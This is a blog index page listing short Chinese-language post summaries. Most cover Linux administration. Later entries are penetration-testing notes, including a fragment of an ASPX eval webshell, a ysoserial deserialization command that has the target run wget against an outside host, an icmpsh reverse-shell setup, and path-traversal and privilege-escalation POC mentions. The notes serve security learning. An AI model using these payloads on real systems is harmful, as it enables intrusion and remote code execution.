摘要: 完全备份:备份文件或目录时只能用完全备份 增量备份:备份分区时可以使用增量备份 差异备份 dump 备份 |选项|含义| | | | | level|0 9,10个备份几笔| | f 文件名|指定备份之后的文件名| | u|备份成功之后,把备份时间记录在/etc/dumpdates文件| | v|显 阅读全文
posted @ 2019-10-09 16:26 mrhonest 阅读(208) 评论(0) 推荐(0)
摘要: rsyslogd lastb 登陆错误日志,文件位于/var/log/btmp,二进制文件 lastlog 记录系统中所有用户最后一次登陆时间的日志,文件位于/var/log/lastlog,二进制文件 last 永久记录所有用户的登陆,注销信息,同时记录系统的启动,重启,关机时间,文件位于/var 阅读全文
posted @ 2019-10-09 16:25 mrhonest 阅读(798) 评论(0) 推荐(0)
摘要: 运行级别 |运行级别|含义| | | | |0|关机| |1|单用户模式,可以想象为windows的安全模式,主要用于系统痛修复| |2|不完全的命令行模式,不包含NFS服务| |3|完全的命令行模式,就是标准的字符界面| |4|系统保留| |5|图形模式| |6|重启动| runlevel 查看运 阅读全文
posted @ 2019-10-09 16:25 mrhonest 阅读(473) 评论(0) 推荐(0)
摘要: 进程 ps |参数|作用| | | | |a|显示前台进程| |x|显示后台进程| |u|显示进程使用的用户| | l|显示更加详细的信息| | e|显示所有进程| 显示说明 |显示|说明| | | | |USER|该进程由哪个用户产生| |PID|进程的ID号| |%CPU|进程占用CPU的百分比 阅读全文
posted @ 2019-10-09 16:23 mrhonest 阅读(251) 评论(0) 推荐(0)
摘要: 主分区最多自能有四个 扩展分区最多只能有一个,也算作主分区的一种,不能存储数据和格式化 逻辑分区:IDE接口最多59个逻辑分区,scsi接口最多有11个逻辑分区 常用命令 df 查看分区(文件)系统的占用情况信息 df命令是从文件系统考虑的,不光要考虑文件占用的空间,还要统计被命令程序序占用的空间( 阅读全文
posted @ 2019-10-09 16:22 mrhonest 阅读(207) 评论(0) 推荐(0)
摘要: 服务的分类 + RPM包默认的安装服务 独立的服务 基于xinetd服务 + 源码包安装的服务 自启动是指让服务在系统开机或重启之后,随着系统的启动而自动启动 查询以安装的服务 RPM包安装的服务 + 启动脚本位置 |位置|作用| | | | |/etc/init.d/|独立服务的启动脚本位置| | 阅读全文
posted @ 2019-10-09 16:22 mrhonest 阅读(217) 评论(0) 推荐(0)
摘要: 软件包分类 源码包 脚本安装包 二进制包 RPM包,系统默认包 rpm包管理 命名规则 + 包名 操作已经安装的软件时,使用包名,是搜索/var/lib/rpm中的数据库 + 包全名 操作的是没有安装的软件包时,要注意安装路径 httpd 2.2.15 15.el6.centos.1.i686.rp 阅读全文
posted @ 2019-10-09 16:21 mrhonest 阅读(262) 评论(0) 推荐(0)
摘要: |文件位置|作用| | | | |/etc/passwd|用户信息文件| |/etc/shadow|影子文件| |/etc/group|组信息文件| |/etc/gshadow|组密码文件| |/home/用户名|普通用户家目录| |/var/spool/mail/用户名|用户邮箱| |/etc/s 阅读全文
posted @ 2019-10-09 16:19 mrhonest 阅读(196) 评论(0) 推荐(0)
摘要: ACL权限 + 查看ACL权限 查看acl权限 + 设定ACL权限 mask是用来指定最大有效权限的 |参数|作用| | | | | m|设定acl权限| | x|删除指定的acl权限| | b|删除所有acl权限| | d|设定默认的acl权限| | k|删除默认acl权限| | R|递归设定ac 阅读全文
posted @ 2019-10-09 16:18 mrhonest 阅读(202) 评论(0) 推荐(0)
摘要: 本系列文章旨在对于有一定网络安全基础的人员,在日常工作中扫描出来的各种漏洞,如何进行验证,以区分该漏洞是否存在或是扫描器误报。请勿应用非法途径。 本漏洞是由于MongoDB未设置访问权限,用户可以直接连上该数据库 Linux下执行 mongo 目标ip:端口号 show dbs;#列出有哪些数据库, 阅读全文
posted @ 2019-10-08 09:24 mrhonest 阅读(867) 评论(0) 推荐(0)
摘要: 基础命令 服务管理 systemctl redhat7 启动服务 重启服务 停止服务 不重启服务下重新加载配置文件 查看服务状态 设置服务开机自动启 设置服务开机不启动 查看服务是否开机自启 查看各个界别下的服务的启动与禁用情况 常用命令 man whatis ` help apropos echo 阅读全文
posted @ 2019-09-29 22:52 mrhonest 阅读(566) 评论(0) 推荐(0)
摘要: 来源:https://www.cnblogs.com/sstfy 简介 IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远 阅读全文
posted @ 2019-09-26 22:30 mrhonest 阅读(470) 评论(0) 推荐(0)
摘要: 安装 服务端 客户端 服务端和客户端均有编译好的 运行 直连 服务端 客户端 DNS 服务端 客户端 阅读全文
posted @ 2019-09-25 10:06 mrhonest 阅读(1123) 评论(0) 推荐(0)
摘要: 本地:ubantu 目标主机:windows 在ubantu上关闭自带的icmp回应 ubantu上启动 pip install impacket python icmpsh_m.py ubantuIP WindowsIP windows上 详细命令 阅读全文
posted @ 2019-09-24 14:56 mrhonest 阅读(592) 评论(0) 推荐(0)
摘要: 靶机 影响版本 泛微e cology 阅读全文
posted @ 2019-09-23 21:49 mrhonest 阅读(1126) 评论(0) 推荐(0)
摘要: 注册时抓包 添加poc 管理员权限 POC 阅读全文
posted @ 2019-09-21 10:24 mrhonest 阅读(2527) 评论(0) 推荐(0)
摘要: https://www.cnblogs.com/Fluorescence tjy/p/9855828.html 一、标准ASPX一句话木马 .NET平台下的一句话木马则百年不变,最常见的当属下面这句 <%@ Page Language=”Jscript”% <%eval(Request.Item[“ 阅读全文
posted @ 2019-09-19 09:25 mrhonest 阅读(674) 评论(0) 推荐(0)
摘要: 我是这样操作的 目标跟windows在一个段,linux是另一个段的,我的虚拟机 windows主机上 `java cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205 阅读全文
posted @ 2019-09-17 15:14 mrhonest 阅读(1511) 评论(0) 推荐(1)
摘要: 起因 一次授权的渗透测试 两个文件下载页面 这个很简单了,修改D:\xxx\xxx\xxx\upload\xxx.docx 即可用dama1.jsp文件名下载下来 正戏 有个上传的地方 是这样的 正常抓取的数据包我没有保存 总之就是把上传成功的文件名改为../../../../../这种 然后在下载 阅读全文
posted @ 2019-09-12 17:02 mrhonest 阅读(247) 评论(0) 推荐(0)
摘要: 各文件对应位置 windows7 配置参数 建立session 获得交互式shell windows2008 R2 64x 蓝屏 阅读全文
posted @ 2019-09-09 10:57 mrhonest 阅读(368) 评论(0) 推荐(0)